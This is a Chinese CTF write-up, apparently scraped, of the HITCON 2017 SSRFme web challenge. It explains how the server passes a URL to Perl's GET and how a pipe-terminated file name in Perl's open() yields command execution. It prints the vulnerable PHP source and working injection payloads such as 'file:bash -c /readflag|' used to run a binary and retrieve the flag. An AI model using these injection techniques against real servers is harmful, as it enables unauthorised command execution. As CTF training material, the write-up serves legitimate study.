WEB|[HITCON 2017]SSRFme

Posted scarecr0w7

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了WEB|[HITCON 2017]SSRFme相关的知识,希望对你有一定的参考价值。

源码

110.244.80.206 <?php
    if (isset($_SERVER[\'HTTP_X_FORWARDED_FOR\'])) 
        $http_x_headers = explode(\',\', $_SERVER[\'HTTP_X_FORWARDED_FOR\']);
        $_SERVER[\'REMOTE_ADDR\'] = $http_x_headers[0];
    # 获取客户端ip地址

    echo $_SERVER["REMOTE_ADDR"];

# 创建sandbox/md5("orange+ip")文件夹并切换
    $sandbox = "sandbox/" . md5("orange" . $_SERVER["REMOTE_ADDR"]);
    @mkdir($sandbox);
    @chdir($sandbox);

    $data = shell_exec("GET " . escapeshellarg($_GET["url"])); # shell_exec()执行命令,url可控
    $info = pathinfo($_GET["filename"]); # 将以数组的形式返回文件路径的信息
    $dir  = str_replace(".", "", basename($info["dirname"])); # 路径中的文件名部分替换.为空
    # 创建文件夹并切换
    @mkdir($dir);
    @chdir($dir);
    # 将shell_exec()执行命令的内容写入文件中
    @file_put_contents(basename($info["basename"]), $data);
    highlight_file(__FILE__);

GET命令

└─# GET -h         
Usage: GET [-options] <url>...
    -m <method>   use method for the request (default is \'GET\')
    -f            make request even if GET believes method is illegal
    -b <base>     Use the specified URL as base
    -t <timeout>  Set timeout value
    -i <time>     Set the If-Modified-Since header on the request
    -c <conttype> use this content-type for POST, PUT, CHECKIN
    -a            Use text mode for content I/O
    -p <proxyurl> use this as a proxy
    -P            don\'t load proxy settings from environment
    -H <header>   send this HTTP header (you can specify several)
    -C <username>:<password>
                  provide credentials for basic authentication

    -u            Display method and URL before any response
    -U            Display request headers (implies -u)
    -s            Display response status code
    -S            Display response status chain (implies -u)
    -e            Display response headers (implies -s)
    -E            Display whole chain of headers (implies -S and -U)
    -d            Do not display content
    -o <format>   Process HTML content in various ways

    -v            Show program version
    -h            Print this message

GET命令可以读取目录和文件内容并返回

payload

?url=/&filename=123

利用GET命令读取根目录内容并写入到123文件中

  • url=/:GET /
  • filename=123:这里只有文件名没有目录,所以当前文件夹为sandbox/md5("orange+ip")

构造url发送请求

访问目录

http://6627f504-5fd7-49ba-b3c3-c2f940d010f4.node4.buuoj.cn:81/sandbox/2eeed2f9aeae6311b507ada8fb98809e/123


可以看到根目录中有flag文件,读取flag文件,但是并没有内容

?url=/flag&filename=123


再看根目录内容还有一个readflag,按ctf常规套路readflag应该是一个可执行文件,需要执行readflag才能读取到flag

perl语言GET open命令漏洞

GET是Lib for WWW in Perl中的命令,目的是模拟http的GET请求,GET函数底层就是调用了open处理,open存在命令执行,并且还支持file函数。要执行的命令先前必须要有以命令为文件名的文件存在。
perl函数看到要打开的文件名中如果以管道符(键盘上那个竖杠 |)结尾,就会中断原有打开文件操作,并且把这个文件名当作一个命令来执行,并且将命令的执行结果作为这个文件的内容写入。

payload1

创建以命令为文件名的文件

?url=&filename=|/readflag

执行命令

?url=file:|/readflag&filename=123

访问页面得到flag

flag6dd67321-ce5e-4254-a00a-f8a27578c75c

payload2

# 创建以命令为文件名的文件
/?url=file:bash -c /readflag|&filename=bash -c /readflag|

# 执行命令
/?url=file:bash -c /readflag|&filename=123

参考文章:
GET的命令执行漏洞

[BUUCTF][HITCON 2017]SSRFme

文章目录

知识点

perl脚本GET open命令漏洞

GET是Lib for WWW in Perl中的命令 目的是模拟http的GET请求,GET函数底层就是调用了open处理

open存在命令执行,并且还支持file函数

新学会的函数

pathinfo

代码审计

前面的代码返回了我的ip,和orange一起进行md5加密。通过url参数输入的内容会以GET命令执行,
命令执行的结果会被存入我们以filename参数的值命名的文件里

<?php
    if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) 
        $http_x_headers = explode(',', $_SERVER['HTTP_X_FORWARDED_FOR']);
        $_SERVER['REMOTE_ADDR'] = $http_x_headers[0];
    

    echo $_SERVER["REMOTE_ADDR"];

    $sandbox = "sandbox/" . md5("orange" . $_SERVER["REMOTE_ADDR"]);
    @mkdir($sandbox);
    @chdir($sandbox);

    $data = shell_exec("GET " . escapeshellarg($_GET["url"]));
    $info = pathinfo($_GET["filename"]);
    $dir  = str_replace(".", "", basename($info["dirname"]));
    @mkdir($dir);
    @chdir($dir);
    @file_put_contents(basename($info["basename"]), $data);
    highlight_file(__FILE__);

尝试读取根目录,并创建文件名为abc的文件


看出应该要用readflag读取flag,构造payload?url=file:bash -c /readflag|&filename=123

以上是关于WEB|[HITCON 2017]SSRFme的主要内容,如果未能解决你的问题,请参考以下文章

bmzctf 刷题 hitcon_2017_ssrfme

[BUUCTF][HITCON 2017]SSRFme

BUUCTF [HITCON 2017]SSRFme 1

BUUCTF [HITCON 2017]SSRFme 1

[原题复现]-HITCON 2016 WEB《babytrick》[反序列化]

bmzctf刷题ssrfme